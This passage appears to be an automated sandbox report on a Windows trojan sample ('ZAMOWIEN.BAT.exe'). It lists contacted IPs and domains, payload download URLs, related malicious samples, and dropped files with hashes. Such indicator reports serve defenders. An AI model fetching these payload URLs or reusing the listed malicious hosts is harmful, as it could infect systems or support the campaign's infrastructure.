                                                          http://enechado.ru.com/ZAMOWIEN.BAT.exe, 00000002.00000003.33485246567.000000000768B000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33540907483.000000000768D000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33484954124.000000000768B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            13.248.169.48
                                                            www.108.foundationUnited States
                                                            16509AMAZON-02UStrue
                                                            103.83.194.50
                                                            enechado.ru.comUnited States
                                                            132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                                            8.210.46.21
                                                            ymx01.cnSingapore
                                                            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                            208.91.197.27
                                                            www.614genetics.onlineVirgin Islands (BRITISH)
                                                            40034CONFLUENCE-NETWORK-INCVGtrue
                                                            43.155.76.124
                                                            b1-3-r111.kunlundns.topJapan4249LILLY-ASUStrue
                                                            104.21.27.59
                                                            www.mydreamdeal.clickUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            81.88.58.216
                                                            kanadeviainova.netItaly
                                                            39729REGISTER-ASITtrue
                                                            66.29.149.46
                                                            www.golivenow.liveUnited States
                                                            19538ADVANTAGECOMUStrue
                                                            195.110.124.133
                                                            officinadelpasso.shopItaly
                                                            39729REGISTER-ASITtrue
                                                            172.67.145.234
                                                            www.vayui.topUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            45.81.23.25
                                                            www.aquax.cloudNetherlands
                                                            49870AS49870-BVNLtrue
                                                            31.31.196.177
                                                            www.nartex-uf.onlineRussian Federation
                                                            197695AS-REGRUtrue
                                                            154.88.22.105
                                                            www.cg19g5.proSeychelles
                                                            40065CNSERVERSUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1562240
                                                            Start date and time:2024-11-25 11:52:44 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 17m 18s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected Instruction Hammering
                                                            Number of analysed new started processes analysed:5
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Sample name:ZAMOWIEN.BAT.exe
                                                            Detection:MAL
                                                            Classification:mal96.troj.spyw.evad.winEXE@7/10@19/13
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 80
                                                            • Number of non-executed functions: 294
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                            • Excluded domains from analysis (whitelisted): login.live.com, ctldl.windowsupdate.com, clients.config.office.net
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: ZAMOWIEN.BAT.exe
                                                            TimeTypeDescription
                                                            05:57:48API Interceptor19561253x Sleep call for process: sdchange.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            13.248.169.48santi.exeGet hashmaliciousFormBookBrowse
                                                            • www.lirio.shop/qp0h/
                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                            • www.optimismbank.xyz/98j3/
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • www.tals.xyz/cpgr/
                                                            VSP469620.exeGet hashmaliciousFormBookBrowse
                                                            • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • www.tals.xyz/cpgr/
                                                            Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                            • www.tals.xyz/stx5/
                                                            Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                            • www.tals.xyz/k1td/
                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                            • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                            • www.remedies.pro/hrap/
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.optimismbank.xyz/lnyv/
                                                            103.83.194.50Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • enechado.ru.com/tk.bin
                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • enechado.ru.com/tk.bin
                                                            ZAM#U00d3WIENIE nr 594uzzf485-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                            • passion4dance.ru.com/POL.bin
                                                            ZAM#U00d3WIENIE nr 594uzzf485-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                            • passion4dance.ru.com/POL.bin
                                                            CONTRACT-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • passion4dance.ru.com/qa.bin
                                                            WTsvUl9X8N.exeGet hashmaliciousOski Stealer, VidarBrowse
                                                            • 9entrevera.sa.com/o/
                                                            SecuriteInfo.com.Win32.SuspectCrc.30843.5697.exeGet hashmaliciousGuLoaderBrowse
                                                            • insula.sa.com/sgp/xkxkBkUGnvBunHoZmLt35.bin
                                                            doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • ytgz5.sa.com/gBuCeYv217.bin
                                                            awb_dhl_shipping_documents_PL&BL_13122023_pdf000000000000000000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • ytgz5.sa.com/KaIWGuoaPXGhlzSd30.bin
                                                            PmX1jHdUnS.exeGet hashmaliciousOski Stealer, VidarBrowse
                                                            • 9enternecera.ru.com/os/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            b1-3-r111.kunlundns.topSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 43.155.76.124
                                                            PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                            • 43.155.76.124
                                                            3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                            • 43.155.76.124
                                                            COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                            • 43.155.76.124
                                                            QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                            • 129.226.56.200
                                                            COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                            • 129.226.56.200
                                                            Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 129.226.56.200
                                                            www.mydreamdeal.clickA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 188.114.96.3
                                                            www.vayui.topS#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 104.21.95.160
                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.145.234
                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.145.234
                                                            ymx01.cnCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 8.210.46.21
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 8.210.46.21
                                                            www.nartex-uf.onlineVSP469620.exeGet hashmaliciousFormBookBrowse
                                                            • 31.31.196.177
                                                            enechado.ru.comRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 103.83.194.50
                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 103.83.194.50
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCapep.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 47.242.96.182
                                                            apep.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 47.90.113.185
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 8.210.46.21
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 8.210.46.21
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 47.253.2.162
                                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 8.215.199.92
                                                            yakuza.sh.elfGet hashmaliciousMiraiBrowse
                                                            • 8.216.26.127
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 47.253.41.50
                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                            • 8.210.114.150
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 8.210.114.150
                                                            NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 103.83.194.50
                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 103.83.194.50
                                                            https://recociese.za.com/wpcones/excel.htmlGet hashmaliciousUnknownBrowse
                                                            • 103.83.194.50
                                                            LPC Scanned Docs-Copyright #U00a9GNP.CPL.dllGet hashmaliciousAsyncRATBrowse
                                                            • 103.83.194.50
                                                            08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.htmlGet hashmaliciousUnknownBrowse
                                                            • 103.83.194.55
                                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 168.81.254.150
                                                            Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                            • 103.83.194.55
                                                            CARDFACTORYAccess Program, Tuesday, October 29, 2024.emlGet hashmaliciousHTMLPhisherBrowse
                                                            • 103.83.194.55
                                                            https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ==Get hashmaliciousTycoon2FABrowse
                                                            • 103.83.194.5
                                                            https://url.avanan.click/v2/r01/___https://drickly-com-dot-fluid-dreamer-410607.uc.r.appspot.com/?h=66LVKOwLflbMjYVoJBNTrXiW3CEpoRg_EafL_ygpoXil&fru;v=755/8c88*~*9&fru;w=6c5ghgij98cg/ffg&fru;E=6a766/89b55*~*9&fru;t=myyue8Fe7Ke7KBBB.lttlqj.htr.xle7Kzwqe8Kxfe8Iye7*~*jxwhe8I3ZR/bSIze7*~*xtzwhje8Ie7*~*whye8I859Oe7*~*e7*~*hie8I7/*~*Ize7*~*zfhye7*~*zwqe8Ifrue7Kxe7KfwrxywtslxyjjqBtwp.htrd.fnlzD___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo3NDhmM2FkMWRiOWU2YTNlMjE1YzgwMzRjMTliODRkZDo3OmNmNmI6NjYyMTE5OWZiNzU5MjU0NTE1ZjgzODM0ZWRlYjRmZDIwOWJmNTQ3YWUwY2MxNmU5NjFiZmExYjYzM2U0YzA0MzpoOlQ6VA#YmJyYWNleUBwcmVzaWRpby5jb20=Get hashmaliciousUnknownBrowse
                                                            • 103.83.194.55
                                                            AMAZON-02UShttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                            • 35.158.4.76
                                                            http://propdfhub.comGet hashmaliciousUnknownBrowse
                                                            • 54.230.112.122
                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 108.139.47.50
                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 13.228.81.39
                                                            05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.166.143.48
                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.166.143.48
                                                            55876.exeGet hashmaliciousUnknownBrowse
                                                            • 18.167.130.152
                                                            55876.exeGet hashmaliciousUnknownBrowse
                                                            • 18.167.130.152
                                                            pXdN91.armv5l.elfGet hashmaliciousMirai, GafgytBrowse
                                                            • 54.171.230.55
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dllRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Readouts.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Readouts.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                    Account& Payment Transfer Details_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      Account& Payment Transfer Details_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                        https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exeGet hashmaliciousUnknownBrowse
                                                                          3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                              rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                Process:C:\Windows\SysWOW64\sdchange.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                Category:dropped
                                                                                Size (bytes):135168
                                                                                Entropy (8bit):1.1142956103012707
                                                                                Encrypted:false
                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):5632
                                                                                Entropy (8bit):3.81704362174321
                                                                                Encrypted:false
                                                                                SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                                                                MD5:3DD80DFF583544514EEB3A5ED851A519
                                                                                SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                                                                SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                                                                SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Detection: malicious, Browse
                                                                                • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                                                                • Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious, Browse
                                                                                • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                                                                • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                                                                • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                                                                • Filename: , Detection: malicious, Browse
                                                                                • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                                                                • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                                                                • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....oZ...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):11776
                                                                                Entropy (8bit):5.890541747176257
                                                                                Encrypted:false
                                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):278834
                                                                                Entropy (8bit):7.587268585042044
                                                                                Encrypted:false
                                                                                SSDEEP:6144:dVc1bEgTtgauMx5TpbosVy+1vBQPtvkIFCKv:dVc1bAauMx5TY2vBCJkVKv
                                                                                MD5:DC67E86D727F70C1A49B6499EBECCE54
                                                                                SHA1:C5B8A90EF31EA75CFAF0DE681DBA81511AEA054E
                                                                                SHA-256:D8A7B7A3AC5834C32B051409D623D69A71C33B8A47FD9051F6625E4D215CCEC7
                                                                                SHA-512:571C28F1E0518F7F9F5A4290A7DC56CBC14426C5FD8FE0A44A758AE611BC7B8E925E8C5CB916E17244FBBDA8C24BAB945C1DA6A492702AC0FF85FBBB4A504634
                                                                                Malicious:false
                                                                                Preview:................EE...................1......*..........................ss........>>>>>>.7..;;.....................................ZZ.............W....q....6......................}...i.......{.................n.....{{...............................................$...............................................v...r....F...........}..................r.||....SSSS.........WW..............................................\\\\\.V........................ ..ee.555..........W...ll........AAA..3...I.H......V.333..........u....^.........88..............$....................-.)))).w..................ff......oo.3...TTTTT....}}........................................````.xxxx....*...............$$.........................?............LLLL....r......h.HHHHHHHHH...........EEEE.EE.............tttt.................]].==..............J...................44........y.v..............:........P..G....=.......2.......w.....................uuuu..................$$$.p.....WWWWW.....ddd.....///..........T.......
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):115358
                                                                                Entropy (8bit):2.675745846616557
                                                                                Encrypted:false
                                                                                SSDEEP:1536:cJlovKnLuGpQg1gIJ4VmMUqL00JI1DsLl7LrJ4JbGB:OouXSeyB
                                                                                MD5:B85C88335452D4735933A9D051C6AB9B
                                                                                SHA1:C8F25867B38705E3CD11DBC736B6F55F96D02B44
                                                                                SHA-256:4106FF2EEA4EC90608E4CFEAB4C317AC947D997543011FFBCBC20B90860F1A7F
                                                                                SHA-512:67A3A812498D84AE484DBBB27A52877442D953CD1DE097D36FBE6CBDC3C2B8200CC81249504B8FBA408201EEECF315E3C4224EB554C9C10E205EFD8CA3EBB8AA
                                                                                Malicious:false
                                                                                Preview:0000000000999900004D000008003A000000C2C2C20000FB000021212100F3F3F3F30000F900000000F900363636000000900000606000BFBF0017000000DDDDDD0000000000050505050037000020000000B700CA0000D400002D0000C9C9000A00B200610065650000005A00FE00A9A9A9A900740000005D00E1000000BF0000CF0000000056003F00004400000072007B7B0000A7A7A7000000BBBBBBBB0000E600004C009999000C000000DF007700007D7D7D7D0000005C5C5C00F1F1F1F100A8A8000083838300000000E9006D6D6D0000530000FD0056560000004C000000DBDBDB000000000000D0D0004949007E7E7E7E7E00676700009D9D000000585800ED007B00F3F3000C000B00FBFBFBFB000000272700191919000029292900007A0028000056008800000000DE00007600000076005959004F0000000000004B4B00040404040028003A000000001000F2F2004D000000AD00430000FA0000B4B400E9E90000004E002A2A2A0000000000F5F5F500C2002300008A8A8A8A00B3B3B3002F0000000000D6D6D600B1000079004E005A0000005500F400650000F200A800E20000BEBE000000000000000000000B0B00000000000000E30000BBBB004C000000003B3B00C3C3C3C3C30000007A006D6D00000000009D00000000002800F0F0F0F00000DF005400000003000000
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):455315
                                                                                Entropy (8bit):1.2477113828127742
                                                                                Encrypted:false
                                                                                SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                                                                MD5:761F2A757CD380F71E205335CE088495
                                                                                SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                                                                SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                                                                SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                                                                Malicious:false
                                                                                Preview:.5......................&.............................a....b.......................e.....................6..........H......................1.....a..J......................L.........................l...........a......................................I...............Y...................4...........................................w.............................................m.......D.......................(................................................................V........................................W.......................................................n.......D.....................................................................}....................................................................................................................z......................................:.....G..N:........................1............N.....................M.......................8.......................................................................Z......b...:...................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                                                                Category:dropped
                                                                                Size (bytes):165466
                                                                                Entropy (8bit):6.5947581943238625
                                                                                Encrypted:false
                                                                                SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                                                                MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                                                                SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                                                                SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                                                                SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                                                                Malicious:false
                                                                                Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((.....................................................Z........................!..1.."AQ.2aq..#B...R...$3br.4Cs...%&5STc..6D...dt...7.'EUu....................................3........................1.!23AqQ."a#4..$B...R..D.............?..H..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):321960
                                                                                Entropy (8bit):1.240482616634199
                                                                                Encrypted:false
                                                                                SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                                                                MD5:66087BEC9068998EE8F271F0580AB3F5
                                                                                SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                                                                SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                                                                SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                                                                Malicious:false
                                                                                Preview:...............................................................S...................................d...........................c........kY....................................................b..........~..f..............o.....................i...........................................................................................z...N...............b..............................@........................ ................;.............../..............$..........J....................I..~.......................................u........................................................................................................................+E.....................u.............j...................................a........................".................6.....4.....................................................................................................z.................P........................................................................................................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):263192
                                                                                Entropy (8bit):1.2599632446975992
                                                                                Encrypted:false
                                                                                SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                                                                MD5:0EDAE6068FC853ECD4597C0C717729E8
                                                                                SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                                                                SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                                                                SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                                                                Malicious:false
                                                                                Preview:........................................................................................................................a......................f.........iU........................n..................................!................................X..................F......M...............................................7.....................l................@.........G..............I...........................................................................4..............I.............................................................................-....$......................^................................................................................................q...............s............................./........................................g...J....}.......j..........................gs.......................................L......H...........~.................L............E.........(................................................O.......................................
                                                                                Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):38
                                                                                Entropy (8bit):4.006841738213845
                                                                                Encrypted:false
                                                                                SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                                                                MD5:8674B487F44FE91156094E810B1A3128
                                                                                SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                                                                SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                                                                SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                                                                Malicious:false
                                                                                Preview:[parsimoniously]..Vesigia=unassessed..
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                Entropy (8bit):7.171521399678043
                                                                                TrID:
